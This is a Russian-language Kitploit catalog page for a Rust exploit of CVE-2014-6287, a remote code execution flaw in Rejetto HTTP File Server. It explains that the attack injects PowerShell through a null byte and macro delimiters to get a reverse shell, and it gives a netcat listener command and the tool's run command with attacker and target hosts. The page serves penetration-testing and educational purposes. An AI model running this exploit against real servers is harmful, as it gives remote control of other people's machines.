Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2014-6287 — Реализация эксплойта CVE-2014-6287 на Rust, нацеленная на Rejetto HTTP File Server (HFS) версий 2.3x до 2.3c. | Kitploit
Инструменты/GitHubGitHub/nika0x38/cve-2014-6287
Генерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеИнструмент Удаленного Доступа
GitHubnika0x38/cve-2014-6287

CVE-2014-6287

Реализация эксплойта CVE-2014-6287 на Rust, нацеленная на Rejetto HTTP File Server (HFS) версий 2.3x до 2.3c.

Репозиторий
111 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2014-6287 - Эксплойт RCE для Rejetto HTTP File Server

Rust Security

Реализация на Rust эксплойта CVE-2014-6287, нацеленного на Rejetto HTTP File Server (HFS) версий 2.3x до 2.3c.

Обзор уязвимости

CVE-2014-6287 — это критическая уязвимость удаленного выполнения кода в Rejetto HTTP File Server (HFS).

Технические детали

  • Затронутое ПО: Rejetto HTTP File Server (HFS) 2.3x до 2.3c
  • Тип уязвимости: Удаленное выполнение кода (RCE)
  • Оценка CVSS: 10.0 (Critical)
  • CWE: CWE-94 (Некорректный контроль генерации кода)

Описание

Функция findMacroMarker в в Rejetto HTTP File Server позволяет удаленным злоумышленникам выполнять произвольные программы через последовательность в поисковом запросе. Эта уязвимость позволяет злоумышленникам обходить проверку ввода и внедрять вредоносный код, который выполняется на целевой системе.

parserLib.pas
%00

Эксплойт работает следующим образом:

  1. Создание вредоносного поискового запроса, содержащего нулевой байт (%00)
  2. Внедрение команд PowerShell в макро-разделители {. и .}
  3. Сервер обрабатывает макрос и выполняет встроенный код PowerShell
  4. Установка обратного соединения оболочки с атакующим

Использование

Шаг 1: Настройка слушателя Netcat

Перед выполнением эксплойта настройте слушатель на вашей атакующей машине для приема обратной оболочки:

root@kitploit:~
# Замените <LPORT> на желаемый порт прослушивания
nc -lvnp <LPORT>

Шаг 2: Выполнение эксплойта

root@kitploit:~
cargo run -- -l <LHOST> -p <LPORT> -r <RHOST> [-t <RPORT>]

Обязательные параметры:

  • -l, --lhost <LHOST>: Ваш локальный IP-адрес (атакующая машина)
  • -p, --lport <LPORT>: Ваш локальный порт для обратной оболочки
  • -r, --rhost <RHOST>: Целевой IP-адрес (уязвимый сервер HFS)

Необязательные параметры:

  • -t, --rport <RPORT>: Целевой порт (по умолчанию: 80)

Отказ от ответственности

Этот инструмент предназначен только для образовательных целей и санкционированного тестирования на проникновение. Используйте ответственно и только на системах, которыми вы владеете или на которые имеете явное разрешение

Скачать инструмент